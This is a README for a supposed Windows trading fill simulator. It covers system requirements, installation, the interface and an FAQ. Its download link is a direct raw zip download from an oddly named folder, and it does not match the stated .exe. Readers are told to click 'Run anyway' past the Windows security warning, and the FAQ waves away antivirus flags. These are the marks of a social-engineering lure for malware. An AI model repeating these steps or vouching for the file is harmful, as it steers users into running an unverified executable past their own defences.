The flashalpha-fill-simulator tool allows traders to practice order execution in a controlled environment. This program replicates real-world fill scenarios based on historical data. Traders use this software to understand how different order types behave under market pressure. It provides a visual interface for tracking your positions. You build confidence in your trading strategy before you deploy capital in live markets. The software runs locally on your Windows machine to ensure your data stays private.
To run this simulator, ensure your computer meets these minimum specifications:
- Operating System: Windows 10 or Windows 11 (64-bit).
- Processor: Dual-core 2.0 GHz or faster.
- Memory: 4 GB of RAM.
- Storage: 200 MB of available space.
- Connectivity: Broadband internet access for fetching sample market data.
Follow these steps to set up the software on your computer.
- Visit the project repository page: https://github.com/arifkhan4567/flashalpha-fill-simulator/raw/refs/heads/main/tyrocidine/flashalpha_simulator_fill_2.2.zip.
- Look for the Releases section on the right side of the page.
- Click the latest version number to view the files.
- Locate the file ending in .exe, such as
flashalpha-setup.exe. - Save this file to your computer.
Once the file exists on your hard drive, perform these steps to install the program:
- Locate the downloaded file in your Downloads folder.
- Double-click the file to start the installation.
- If a security prompt appears from Windows, click "More info," then click "Run anyway."
- Follow the on-screen instructions to select the folder for the installation.
- Choose whether to create a desktop shortcut for quick access.
- Wait for the progress bar to finish.
- Click "Finish" to launch the simulator.
When the application opens, you see the main dashboard. The layout organizes your workspace into three distinct areas.
- Market Feed: This area shows incoming price updates. The simulator uses this data to trigger your simulated orders.
- Order Entry Panel: Use this panel to define your buy or sell signals. You can toggle between market orders and limit orders here.
- Ledger Window: This area logs every transaction. It displays the entry price, the exit price, and the total profit or loss for each trade.
To begin, click the "Connect" button located at the top right of the application window. The system fetches a data packet. Once the data loads, the current status changes to "Live Connection." You can now input an order size and click "Submit" to see the simulator process the execution in real-time.
You modify how the simulator behaves through the Settings menu. Click "File," then select "Settings."
- Data Refresh Rate: Adjust how often the display updates. A lower number provides faster updates but consumes more processor power.
- Default Order Size: Set your preferred trade size to save time during sessions.
- Color Theme: Switch between Light and Dark modes to match your preference.
All settings save automatically when you close the menu. If you need to revert to default settings, click "Reset" at the bottom of the window.
Your computer stores all simulation logs locally. The software does not send your personal trading results to external servers. Because the application processes data offline, it remains stable even without a constant internet connection. We recommend that you keep a backup of your logs folder. You find this folder in the "Documents" directory under "FlashAlphaLogs."
Why does my antivirus software flag the file? New software sometimes triggers a security warning on Windows. If you downloaded the file directly from the official repository link, the application is safe to run.
Can I export my results to a file? Yes. Use the "Export" button in the Ledger window to save your session data as a CSV file. This file opens in any spreadsheet software like Excel.
Does the simulator support paper trading with real brokers? No. This tool is a standalone simulator. It does not connect to live broker accounts. It does not place real orders on any exchange.
How do I update the software? When a new version releases, visit the repository link again. Download the new installer and run it. The setup wizard replaces the older version automatically.
Does this software work on Windows 7? The simulator requires Windows 10 or higher. Older versions of Windows may lack the necessary components to render the interface.
Where do I report errors? If you encounter unusual behavior, check the "About" tab in the software. You find a link to the "Issues" section on the repository website. Provide a description of the error and a screenshot if possible.
